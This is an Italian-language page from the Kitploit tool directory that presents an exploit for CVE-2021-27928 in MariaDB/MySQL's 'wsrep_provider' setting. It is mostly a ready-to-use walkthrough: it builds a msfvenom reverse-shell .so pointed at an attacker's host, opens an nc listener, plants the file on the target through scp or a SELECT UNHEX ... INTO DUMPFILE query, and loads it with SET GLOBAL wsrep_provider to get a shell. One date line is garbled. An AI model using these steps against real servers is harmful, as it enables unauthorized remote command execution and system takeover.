Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-27928 — CVE-2021-27928 MariaDB/MySQL-'wsrep provider' Vulnerabilità di iniezione di comandi | Kitploit
Strumenti/GitHubGitHub/al1ex/cve-2021-27928
Analisi delle VulnerabilitàExploitPenetration TestingCommand and ControlSviluppo PayloadSicurezza dei Database
GitHubal1ex/cve-2021-27928

CVE-2021-27928

CVE-2021-27928 MariaDB/MySQL-'wsrep provider' Vulnerabilità di iniezione di comandi

Vedi Repository
63133 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Informazioni

root@kitploit:~
Exploit Title: MariaDB 10.2 /MySQL - Esecuzione di comandi OS tramite 'wsrep_provider'
Data: 03/18/2021
Autore Exploit: Central InfoSec
Versione: 
	MariaDB 10.2 prima di 10.2.37
	10.3 prima di 10.3.28
	10.4 prima di 10.4.18 
	10.5 prima di 10.5.9
Percona Server fino al 2021-03-03; e la patch wsrep fino al 2021-03-03 per MySQL
Testato su: Linux
CVE: CVE-2021-27928

Come sfruttare

Passo 1: Creare il payload della reverse shell

root@kitploit:~
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o CVE-2021-27928.so

payload

Passo 2: Avviare un listener

root@kitploit:~
nc -lnvp <port>

nc

Passo 3: Copiare il payload sulla macchina target

Tramite SCP

root@kitploit:~
scp CVE-2021-27928.so <user>@<ip>:/tmp/CVE-2021-27928.so

Tramite Dumpfile

root@kitploit:~
python3 -c 'print(open("CVE-2021-27928.so", "rb").read().hex())'
mysql -u <user> -p -h <ip>
SELECT UNHEX('PYTHON_OUTPUT') into dumpfile '/tmp/CVE-2021-27928.so';

Passo 4:Eseguire il payload

root@kitploit:~
mysql -u <user> -p -h <ip>
SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";

shell

Riferimenti

https://www.exploit-db.com/exploits/49765

https://jira.mariadb.org/browse/MDEV-25179

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27928

Scarica lo strumento